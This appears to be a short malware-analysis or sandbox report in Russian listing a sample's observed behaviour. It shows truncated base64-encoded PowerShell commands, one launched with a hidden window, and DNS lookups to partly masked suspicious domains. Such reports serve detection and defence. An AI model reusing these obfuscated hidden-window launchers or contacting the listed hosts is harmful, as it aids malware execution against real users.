Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAHUAYgB1AGgAdwBkAGgAawBtAHgAdQA9ACcAVgBvAGMAeQBvAG4AdwB3AGcAJwA7ACQAUgBjAGcAdgBsAHcAawB5AHMAdQAgAD...
- DNS ASK wo####lasscrew.com
- DNS ASK pc###india.com
- DNS ASK jo####nrylive.com
- DNS ASK co###jotex.com
- DNS ASK pr#####naparthotel.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAHUAYgB1AGgAdwBkAGgAawBtAHgAdQA9ACcAVgBvAGMAeQBvAG4AdwB3AGcAJwA7ACQAUgBjAGcAdgBsAHcAawB5AHMAdQAgAD...' (со скрытым окном)